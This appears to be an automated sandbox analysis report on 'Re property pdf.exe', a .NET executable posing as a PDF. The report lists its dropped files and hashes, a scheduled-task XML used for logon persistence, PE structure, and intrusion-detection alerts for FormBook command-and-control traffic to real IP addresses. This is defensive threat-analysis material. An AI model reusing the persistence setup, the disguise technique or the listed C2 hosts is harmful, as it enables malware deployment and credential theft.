                                                                                                                            Process:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:false
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2232
                                                                                                                            Entropy (8bit):5.380805901110357
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZMRvUyus:lGLHxvCsIfA2KRHmOugras
                                                                                                                            MD5:206820631F5A535AD90324CEA0C3F71B
                                                                                                                            SHA1:A79FC4006BB113CEBB5D00EC355638740985079F
                                                                                                                            SHA-256:AAAB7406C1292ACBC9740C2926E7F3C4B3E2D3D1CCDC31A15D5BEEF73174EF6A
                                                                                                                            SHA-512:53A1B1975EA33ED7C577F923D07B9072222EE4098A4EB363DE0DC7234F80B10A216399132803904885F59A6DE7509C824A5259EE8E89D366C9EE2F7B3AD54AD2
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                            C:\Users\user\AppData\Local\Temp\15IDF6Mq

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\PresentationHost.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):114688
                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2sko0ow.pl2.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elqsa325.21x.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i45hesfw.i03.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtb0srla.15e.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1580
                                                                                                                            Entropy (8bit):5.116723693613252
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtap9xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTaDv
                                                                                                                            MD5:E8D9B7DF7C39F49D2826876535F11C0A
                                                                                                                            SHA1:859F56DE28201CF6BBB7213C0D165643898A4CAE
                                                                                                                            SHA-256:48FBB2FF40B7CF99F4A1BDEDC11BA37A6E1F7C62BD405DD56CE5A4ECD328F1E8
                                                                                                                            SHA-512:4AC392E7165E07DE5A921B83A67E694C2CAA22976E98F76DE4370C4EB61F4D207B39C1984DC70761FB5112FB2FE0D04F8EBDC32DA05F5D4AC6178EF866626953
                                                                                                                            Malicious:true
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp600C.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1580
                                                                                                                            Entropy (8bit):5.116723693613252
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtap9xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTaDv
                                                                                                                            MD5:E8D9B7DF7C39F49D2826876535F11C0A
                                                                                                                            SHA1:859F56DE28201CF6BBB7213C0D165643898A4CAE
                                                                                                                            SHA-256:48FBB2FF40B7CF99F4A1BDEDC11BA37A6E1F7C62BD405DD56CE5A4ECD328F1E8
                                                                                                                            SHA-512:4AC392E7165E07DE5A921B83A67E694C2CAA22976E98F76DE4370C4EB61F4D207B39C1984DC70761FB5112FB2FE0D04F8EBDC32DA05F5D4AC6178EF866626953
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                            C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):702976
                                                                                                                            Entropy (8bit):7.860155640899553
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:cKIFhlPlL/LMopPIIA6J1x5/9uQQbolbczlsP7AAsZK4G45AWqpA/:cKIdPlL4wo6PL9EbolbczlsP0A/43d0u
                                                                                                                            MD5:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            SHA1:991801525B52069BB48C8C2907DCB587C592CE11
                                                                                                                            SHA-256:A9D4AA43728B39FDE9BA1AE406C10904369C6CCFBEED1C347B847B0E8CA6BCB1
                                                                                                                            SHA-512:070313B2038B7A4E4E2D3CCB0668081136DB1CA0B855BAC3F5DC698E2CCE52E035CFC9E93B63D6578593D6E1104B3D7D069D7E5188FE62E3A967C4B5E8F9CF7E
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ........@.. ....................... ............`.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......8?...9......@....y...G..........................................V.(.......s....o.....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(.....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..s6...}......}.....(.......(*....*&..(.....*....0..@.........{.....{....o;...(...+o ...

                                                                                                                            C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe:Zone.Identifier

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.860155640899553
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                            File name:Re property pdf.exe
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5:a217ff7da729f56faf0bb3de4ad87f40
                                                                                                                            SHA1:991801525b52069bb48c8c2907dcb587c592ce11
                                                                                                                            SHA256:a9d4aa43728b39fde9ba1ae406c10904369c6ccfbeed1c347b847b0e8ca6bcb1
                                                                                                                            SHA512:070313b2038b7a4e4e2d3ccb0668081136db1ca0b855bac3f5dc698e2cce52e035cfc9e93b63d6578593d6e1104b3d7d069d7e5188fe62e3a967c4b5e8f9cf7e
                                                                                                                            SSDEEP:12288:cKIFhlPlL/LMopPIIA6J1x5/9uQQbolbczlsP7AAsZK4G45AWqpA/:cKIdPlL4wo6PL9EbolbczlsP0A/43d0u
                                                                                                                            TLSH:C6E41260A92EEC32C9E517B01130E7B30B769ECCE411D3139AEEECD7BA167963595390
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ........@.. ....................... ............`................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:01242c66198d8d9e

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x4ac0ea
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x670CAC16 [Mon Oct 14 05:28:54 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac0980x4f.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x13a0.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x20000xaa0f00xaa2008fcde93f14ddb9ff7422e5b43203b757False0.9354421151726672data7.86751234729538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0xae0000x13a00x1400ebb35198339d57f64c78c30ea7b3d150False0.7779296875data7.02613144452689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0xb00000xc0x2001a1c52b516a55b98a1461b2cf52e3751False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_ICON0xae0c80xf91PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8936010037641154
                                                                                                                            RT_GROUP_ICON0xaf06c0x14data1.05
                                                                                                                            RT_VERSION0xaf0900x30cdata0.4307692307692308

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                            Network Behavior

                                                                                                                            Suricata IDS Alerts

                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-10-19T12:57:04.005504+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497623.33.130.19080TCP
                                                                                                                            2024-10-19T12:57:19.980760+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449843172.67.181.18680TCP
                                                                                                                            2024-10-19T12:57:22.531220+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449858172.67.181.18680TCP
                                                                                                                            2024-10-19T12:57:22.531220+02002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.449858172.67.181.18680TCP
                                                                                                                            2024-10-19T12:57:25.081677+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449873172.67.181.18680TCP
                                                                                                                            2024-10-19T12:57:27.617419+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449888172.67.181.18680TCP
                                                                                                                            2024-10-19T12:57:33.502533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449919104.223.44.19580TCP
                                                                                                                            2024-10-19T12:57:36.076138+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449935104.223.44.19580TCP
                                                                                                                            2024-10-19T12:57:38.646681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449950104.223.44.19580TCP
                                                                                                                            2024-10-19T12:57:41.162826+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449965104.223.44.19580TCP
                                                                                                                            2024-10-19T12:57:46.915593+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449996203.161.41.20480TCP
                                                                                                                            2024-10-19T12:57:49.499537+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450012203.161.41.20480TCP
                                                                                                                            2024-10-19T12:57:52.075550+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018203.161.41.20480TCP
                                                                                                                            2024-10-19T12:57:54.615907+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450019203.161.41.20480TCP
                                                                                                                            2024-10-19T12:58:00.290772+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500203.33.130.19080TCP
                                                                                                                            2024-10-19T12:58:02.812516+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500213.33.130.19080TCP
                                                                                                                            2024-10-19T12:58:05.380413+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500223.33.130.19080TCP
                                                                                                                            2024-10-19T12:58:07.936908+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500233.33.130.19080TCP
                                                                                                                            2024-10-19T12:58:14.950484+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:17.485658+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:20.030369+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:22.594449+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450027221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:29.004494+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028199.59.243.22780TCP
